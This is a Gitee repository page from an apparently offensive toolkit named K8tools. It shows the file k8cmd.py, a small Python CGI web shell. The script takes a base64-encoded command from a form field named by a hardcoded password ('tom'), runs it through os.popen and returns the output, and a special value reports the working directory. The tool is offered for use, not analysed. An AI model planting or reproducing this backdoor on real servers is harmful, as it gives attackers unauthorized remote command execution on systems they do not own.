76 Star 335 Fork 133

bxqtee / K8tools

加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
克隆/下载
k8cmd.py 411 Bytes
一键复制 编辑 原始数据 按行查看 历史
k8gege 提交于 2019-02-24 17:40 . Add files via upload
#!C:/Python27/python.exe
# -*- coding: utf-8 -*-
# enable debugging
pwd='tom';
import base64
import os
import cgi
import subprocess
form = cgi.FieldStorage()
if form.has_key(pwd) and form[pwd].value != "":
cmdLine = form[pwd].value
print ''
if cmdLine=='Szh0ZWFt':
print '[S]' + os.path.abspath('.') + '[E]'
else:
print '->|' + os.popen(base64.b64decode(cmdLine)).read() + '|<-'
PowerShell
1
https://gitee.com/bxqtee/K8tools.git
git@gitee.com:bxqtee/K8tools.git
bxqtee
K8tools
K8tools
master

搜索帮助